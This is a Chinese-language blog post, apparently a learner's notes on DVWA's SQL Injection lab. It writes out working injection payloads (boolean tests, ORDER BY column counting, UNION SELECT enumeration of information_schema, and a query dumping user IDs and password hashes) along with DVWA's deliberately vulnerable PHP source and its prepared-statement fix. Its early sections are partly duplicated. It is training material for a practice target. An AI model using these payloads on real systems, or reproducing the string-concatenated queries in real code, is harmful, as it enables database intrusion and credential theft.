dvwa-SQL Injection
2017-05-16 21:50
357 查看
是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据
先输入1 ,返回结果
第二步
输入1' AND '1'='2,没有反映
第三步
输入
返回了多个结果,说明存在字符型注入。//?为什么。
6.2 其实在这里输入1'是可以直接看到类型的。明显的,是字符型 ''1'''
第二步无法显示是因为它执行了,并且发现它错误了,所以没有结果,与它相对应的就好 1' AND '1'='1 它们两个分别输入的时候,如果出现不同的说明这是字符型漏洞
而数字型漏洞就是1 AND 1=1 和 1 AND 1=2 ,如果它们出现不同的情况就是数字型漏洞了,反之则不是。
第三步我觉得和输入 1’ AND ‘1’=‘1 结果相同,所以可以用来判断类型。
1.输入
2.输入
3.输入
只有2个字段
3.确定显示的字段顺序(为什么我觉得多次一举呢)
union select 必须产生相同数目的列,对应类型要相同
可以发现先是first name 再是surname
group_concat() 能将相同的行组合起来,把与1相同的放在了一起
table_name 表的名称
information_schema.tables 数据库系统的表格
table_schema 表所属的数据库名
这说明有两个表
参考:http://blog.csdn.net/cnbird2008/article/details/6217839
6.获取表中的字段名
1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #
表中有那些字段
全爆出来了!!
Medium
利用mysql_real_escape_string函数对特殊符号
\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。那我们就用抓包来修改数据,再传给服务器,步骤和上面一样,但是要注意“'”没用了,不过在这里第一步发现字符型注入变成了数字型注入,数字型注入不需要引号,如果非要使用引号,可以使用16进制试试。
直接看我16进制绕过的部分
high
和低级的差不多,因为最终还是可以用注释,给注释掉。
impossible
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据
<?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } mysqli_close($GLOBALS["___mysqli_ston"]); } ?>
1.判断是否存在注入,注入是字符型还是数字型
第一步先输入1 ,返回结果
第二步
输入1' AND '1'='2,没有反映
第三步
输入
1' OR '1234'='1234 ,返回结果
返回了多个结果,说明存在字符型注入。//?为什么。
6.2 其实在这里输入1'是可以直接看到类型的。明显的,是字符型 ''1'''
第二步无法显示是因为它执行了,并且发现它错误了,所以没有结果,与它相对应的就好 1' AND '1'='1 它们两个分别输入的时候,如果出现不同的说明这是字符型漏洞
而数字型漏洞就是1 AND 1=1 和 1 AND 1=2 ,如果它们出现不同的情况就是数字型漏洞了,反之则不是。
第三步我觉得和输入 1’ AND ‘1’=‘1 结果相同,所以可以用来判断类型。
2.猜解SQL查询语句中的字段数
前置知识点:字段数:差不多就是列的个数 order by:用来排序的,默认升序1.输入
1' OR 1=1 order by 1 # //表示 所select 的字段按第一个字段排序
2.输入
1' OR 1=1 order by 2 #
3.输入
1' OR 1=1 order by 3 #
只有2个字段
3.确定显示的字段顺序(为什么我觉得多次一举呢)
union select 必须产生相同数目的列,对应类型要相同
1' union select 2,1 #
1' union select 1,2 #
可以发现先是first name 再是surname
4.获取当前数据库
1' union select 1,database() #5.获取数据库中的表
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #group_concat() 能将相同的行组合起来,把与1相同的放在了一起
table_name 表的名称
information_schema.tables 数据库系统的表格
table_schema 表所属的数据库名
这说明有两个表
参考:http://blog.csdn.net/cnbird2008/article/details/6217839
6.获取表中的字段名
1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #
表中有那些字段
7.下载数据
1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #全爆出来了!!
Medium
利用mysql_real_escape_string函数对特殊符号
\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。那我们就用抓包来修改数据,再传给服务器,步骤和上面一样,但是要注意“'”没用了,不过在这里第一步发现字符型注入变成了数字型注入,数字型注入不需要引号,如果非要使用引号,可以使用16进制试试。
直接看我16进制绕过的部分
high
<?php if( isset( $_SESSION [ 'id' ] ) ) { // Get input $id = $_SESSION c867 [ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";//LIMIT 1输出一个结果 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?> |
impossible
<?php if( isset( $_GET[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $id = $_GET[ 'id' ]; // Was a number entered? if(is_numeric( $id )) { // Check the database $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); $data->bindParam( ':id', $id, PDO::PARAM_INT ); //预处理? //这个感觉靠谱:http://blog.csdn.net/wusuopubupt/article/details/9668501 $data->execute(); $row = $data->fetch(); // Make sure only 1 result is returned if( $data->rowCount() == 1 ) { // Get values $first = $row[ 'first_name' ]; $last = $row[ 'last_name' ]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } } // Generate Anti-CSRF token generateSessionToken(); ?>[/code]
相关文章推荐
- dvwa-sql injection(blind)
- DVWA-WooYun SQL Injection
- DVWA-master新手指南之SQL Injection(二)
- DVWA下的SQL Injection(Blind)
- dvwa学习之七:SQL Injection
- DVWA系列之5 SQL Injection (Blind)
- DVWA - SQL Injection (low, medium, high)
- DVWA - SQL Injection (Blind) (low)
- DVWA之low级别SQL Injection
- DVWA-1.9全级别教程之SQL Injection
- DVWA的使用3–SQL Injection(SQL注入)
- DVWA-1.9全级别教程之SQL Injection(Blind)
- DVWA的使用4–SQL Injection(Blind)(SQL盲注)
- 用PHP函数解决SQL injection 作者:lm92 来源:CSDN
- sql injection终极利用方法
- vBulletin Forum 2.3.xx SQL Injection
- SQL Injection规避入侵检测技术总结
- PHP中的代码安全和SQL Injection防范
- 微软发布3款SQL INJECTION攻击检测工具
- LINQ - 對付 SQL Injection 的 "免費補洞策略" (转)